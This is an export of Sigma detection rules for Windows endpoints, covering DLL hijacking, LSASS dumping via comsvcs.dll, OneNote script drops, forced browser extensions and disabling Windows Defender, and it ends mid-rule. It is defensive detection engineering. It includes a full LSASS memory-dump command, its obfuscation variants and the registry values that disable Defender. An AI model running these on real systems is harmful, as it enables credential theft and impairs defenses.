"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "961445af-546f-4e48-a76f-f49a656805ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081706Z",
"creation_date": "2026-03-23T11:45:34.081709Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081713Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eudcedit.yml",
"content": "title: DLL Hijacking via EUDCEDIT.exe\nid: 961445af-546f-4e48-a76f-f49a656805ea\ndescription: |\n Detects potential Windows DLL Hijacking via EUDCEDIT.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EUDCEDIT.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mfc42u.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "961445af-546f-4e48-a76f-f49a656805ea",
"rule_name": "DLL Hijacking via EUDCEDIT.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EUDCEDIT.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "967f9803-c95f-4591-a904-25a2f478158a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078253Z",
"creation_date": "2026-03-23T11:45:34.078255Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/rundll32/",
"https://beta.hackndo.com/remote-lsass-dump-passwords/",
"https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/"
],
"name": "t1003_001_rundll32_comsvcs.yml",
"content": "title: Process Memory Dumped via comsvcs.dll\nid: 967f9803-c95f-4591-a904-25a2f478158a\ndescription: |\n Detects a suspicious attempt to dump process memory using the `MiniDump` function of the `comsvcs.dll` DLL.\n This technique is often used to dump the LSASS.exe process memory.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/rundll32/\n - https://beta.hackndo.com/remote-lsass-dump-passwords/\n - https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\ndate: 2021/04/15\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Comsvcs\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe C:\\windows\\System32\\comsvcs.dll MiniDump 608 C:\\lsass.dmp full\n selection_binary:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_full:\n CommandLine|contains: ' full'\n selection_function:\n CommandLine|contains:\n - 'MiniDump '\n - '#24'\n - '#+24'\n - '#+0000^24'\n - '#+000^24'\n - '#+00^24'\n - '#+0^24'\n - '#+024'\n - '#+000024'\n - '#+00024'\n - '#+0024'\n # https://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/\n - '#-4294967272'\n - '#-18446744073709551592'\n # https://twitter.com/Wietze/status/1542107456507203586\n - '024'\n\n exclusion_commandline:\n CommandLine|contains:\n - '\\rundll32.exe shell32.dll, ShellExec_RunDLL '\n - '\\rundll32.exe ?:\\Program Files\\'\n - '\\rundll32.exe ?:\\Program Files (x86)\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "967f9803-c95f-4591-a904-25a2f478158a",
"rule_name": "Process Memory Dumped via comsvcs.dll",
"rule_description": "Detects a suspicious attempt to dump process memory using the `MiniDump` function of the `comsvcs.dll` DLL.\nThis technique is often used to dump the LSASS.exe process memory.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-04-15",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "968bc0e0-0756-40f8-b390-3a0efb677d16",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587004Z",
"creation_date": "2026-03-23T11:45:34.587007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587015Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_devicepairingwizard.yml",
"content": "title: DLL Hijacking via devicepairingwizard.exe\nid: 968bc0e0-0756-40f8-b390-3a0efb677d16\ndescription: |\n Detects potential Windows DLL Hijacking via devicepairingwizard.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'devicepairingwizard.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\devicepairing.dll'\n - '\\dwmapi.dll'\n - '\\mfc42u.dll'\n - '\\OLEACC.dll'\n - '\\xwizards.dll'\n - '\\xwtpw32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "968bc0e0-0756-40f8-b390-3a0efb677d16",
"rule_name": "DLL Hijacking via devicepairingwizard.exe",
"rule_description": "Detects potential Windows DLL Hijacking via devicepairingwizard.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "968d93a7-fa28-4f81-966a-7c42659a687a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086978Z",
"creation_date": "2026-03-23T11:45:34.086981Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086988Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs",
"https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/",
"https://attack.mitre.org/techniques/T1566/001/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_onenote_script_file_creation.yml",
"content": "title: Suspicious Script File Created in OneNote Folder\nid: 968d93a7-fa28-4f81-966a-7c42659a687a\ndescription: |\n Detects the creation of script files in the OneNote local user folder.\n Attackers can craft malicious OneNote files containing scripts that can be executed if the user is lured into clicking a malicious button.\n It is recommended to download and analyze the created script and look for suspicious execution following this alert.\nreferences:\n - https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs\n - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n - https://attack.mitre.org/techniques/T1566/001/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/07/15\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566.001\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_creation:\n Kind: 'create'\n ProcessImage|endswith: '\\ONENOTE.EXE'\n Path|contains:\n - '\\OneNote\\\\*\\Exported\\'\n - '\\onenoteofflinecache_files\\'\n\n selection_extension:\n Path|endswith:\n - '.cmd'\n - '.bat'\n - '.js'\n - '.vbs'\n - '.wsf'\n - '.wsh'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "968d93a7-fa28-4f81-966a-7c42659a687a",
"rule_name": "Suspicious Script File Created in OneNote Folder",
"rule_description": "Detects the creation of script files in the OneNote local user folder.\nAttackers can craft malicious OneNote files containing scripts that can be executed if the user is lured into clicking a malicious button.\nIt is recommended to download and analyze the created script and look for suspicious execution following this alert.\n",
"rule_creation_date": "2024-07-15",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1218",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "96c49a7f-c8de-48bb-82d9-54f43c6cd2d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620645Z",
"creation_date": "2026-03-23T11:45:34.620647Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620652Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/",
"https://www.connectwise.com/blog/threat-report/smash-jacker",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_forceinstall.yml",
"content": "title: Chrome-based Browser Extension Force-installed\nid: 96c49a7f-c8de-48bb-82d9-54f43c6cd2d6\ndescription: |\n Detects a modification of the registry key used to force the installation of an extension in Chrome or Edge.\n Adversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\n It is recommended to check if the process modifying the registry key has legitimate reason to do it and if the extension is legitimate.\nreferences:\n - https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/\n - https://www.connectwise.com/blog/threat-report/smash-jacker\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist'\n - 'Software\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist'\n\n # This is handled by the rule a6cace98-683f-4957-8835-f651ff11941e\n filter_known_malicious_extension:\n Details: 'macjkjgieeoakdlmmfefgmldohgddpkj'\n\n filter_empty:\n Details:\n - ''\n - ' '\n - '1'\n - '(empty)'\n\n exclusion_program_files:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_msiexec:\n Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_dameware:\n Image: '?:\\Windows\\dwrcs\\DWRCS.EXE'\n\n exclusion_deviceenroller:\n Image: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_setup:\n Image: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_ccmexec:\n Image: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_omadmclient:\n Image: '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\NisSrv.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\ConfigSecurityPolicy.exe'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n Details|startswith:\n - 'gpmlagmcbcnjhkdjiofoenkfbaclgjkk' # HP extension\n - 'cfoiggbemmmephfeingijgmabjfnhmoe' # Websense\n\n exclusion_lenovo:\n Image: '?:\\Windows\\System32\\drivers\\Lenovo\\udc\\Service\\UDClientService.exe'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - 'Lenovo'\n ProcessSigned: 'true'\n\n exclusion_symantec:\n Image: '?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\NTRDefs\\\\*\\ntrproxy.exe'\n ProcessSignature: 'Symantec Corporation'\n ProcessSigned: 'true'\n\n exclusion_symantec_definition:\n Details:\n - 'amnfbgkhpdmeeobndndgebhdklioljbc;?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\WebExtDefs\\\\*\\updates.xml'\n - 'hlgkjeecidokoilkiocgkakgnengkppc;?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\WebExtDefs\\\\*\\updates.xml'\n - 'hjhklbomhmbfockimpldchgpbnccmbgp;?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Definitions\\WebExtDefs\\\\*\\updates.xml'\n\n exclusion_trendmicro:\n Image|endswith: '\\Deep Security Agent\\dsa.exe'\n ProcessSignature: 'Trend Micro, Inc.'\n ProcessSigned: 'true'\n\n exclusion_mmc:\n ProcessImage: '?:\\WINDOWS\\system32\\mmc.exe'\n\n exclusion_secnom:\n Image: '?:\\Windows\\System32\\SECOMN64.exe'\n ProcessSignature: 'Sound Research Corporation'\n ProcessSigned: 'true'\n\n exclusion_vmms:\n Image: '?:\\Windows\\System32\\vmms.exe'\n\n exclusion_eset:\n ProcessAncestors|contains: '|?:\\Program Files\\ESET\\RemoteAdministrator\\Agent\\ERAAgent.exe|'\n\n exclusion_ocsagent:\n ProcessAncestors|contains: '|?:\\Program Files\\OCS Inventory Agent\\download.exe|'\n\n # Interact Software\n exclusion_ia4:\n Details:\n - 'jifbnihciifbfeiiijegkfnbigagacjk;file:///?:\\Program Files (x86)\\Interact\\\\\\\\Res\\update_iachrome.xml'\n - 'lihjcocccmfbjlkgnhjjinoacbmilcpd;file:///?:\\Program Files (x86)\\Interact\\\\\\\\Res\\update_iaedge.xml'\n\n # https://chromewebstore.google.com/detail/libersign/jligpldajocilccnnokfnghlamfhnppc\n exclusion_libersign:\n Details: 'jligpldajocilccnnokfnghlamfhnppc;https://clients2.google.com/service/update2/crx'\n\n # https://chromewebstore.google.com/detail/keepassxc-browser/oboonakemofpalcgghocfoadofidjkkk\n # https://microsoftedge.microsoft.com/addons/detail/keepassxcbrowser/pdffhmdngciaglkoonimfcmckehcpafo\n exclusion_keepassxc:\n Details:\n - 'oboonakemofpalcgghocfoadofidjkkk;https://clients2.google.com/service/update2/crx'\n - 'pdffhmdngciaglkoonimfcmckehcpafo;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/ublock-origin/odfafepnkmbhccpbejgmiehpchacaeak\n exclusion_ublock:\n Details: 'odfafepnkmbhccpbejgmiehpchacaeak;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/cookie-autodelete/djkjpnciiommncecmdefpdllknjdmmmo\n exclusion_cookie_autodelete:\n Details: 'djkjpnciiommncecmdefpdllknjdmmmo;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/gestionnaire-de-mots-de-p/jbkfoedolllekgbhcbcoahefnbanhhlh\n exclusion_bitwarden:\n Details:\n - 'jbkfoedolllekgbhcbcoahefnbanhhlh;https://edge.microsoft.com/extensionwebstorebase/v1/crx'\n - 'nngceckbapebfimnlniiiahkandclblb;https://clients2.google.com/service/update2/crx'\n\n exclusion_sentinelone:\n Details:\n - 'ogjmklkhajdbaannfffilmkpneihckoh'\n - 'iekfdmgbpmcklocjhlabimljddkeflgl;https://clients2.google.com/service/update2/crx'\n\n # https://microsoftedge.microsoft.com/addons/detail/citrix-workspace-web-exte/pmdpflpcmcomdkocbehamllbfkdgnalf\n exclusion_citrix:\n Details: 'pmdpflpcmcomdkocbehamllbfkdgnalf'\n\n # https://chromewebstore.google.com/detail/microsoft-single-sign-on/ppnbnpeolgkicgegkbkbjmhlideopiji\n exclusion_microsoft:\n Details: 'ppnbnpeolgkicgegkbkbjmhlideopiji'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "96c49a7f-c8de-48bb-82d9-54f43c6cd2d6",
"rule_name": "Chrome-based Browser Extension Force-installed",
"rule_description": "Detects a modification of the registry key used to force the installation of an extension in Chrome or Edge.\nAdversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\nIt is recommended to check if the process modifying the registry key has legitimate reason to do it and if the extension is legitimate.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "96d7e124-2dc0-4aca-b39d-6f7c5a29e1c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621642Z",
"creation_date": "2026-03-23T11:45:34.621644Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621649Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/12/13/defender-control/",
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_disable_service.yml",
"content": "title: Windows Defender Service Disabled\nid: 96d7e124-2dc0-4aca-b39d-6f7c5a29e1c5\ndescription: |\n Detects the Windows Defender service (WinDefend) being disabled via registry.\n Adversaries may disable Windows Defender service to avoid possible detection of their malicious activities.\n It is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\nreferences:\n - https://thedfirreport.com/2020/12/13/defender-control/\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/05/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ServiceStop\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinDefend\\Start'\n Details:\n - 'DWORD (0x00000004)' # SERVICE_DISABLED\n - 'DWORD (0x00000003)' # SERVICE_DEMAND_START\n ProcessParentImage|contains: '\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # Related to 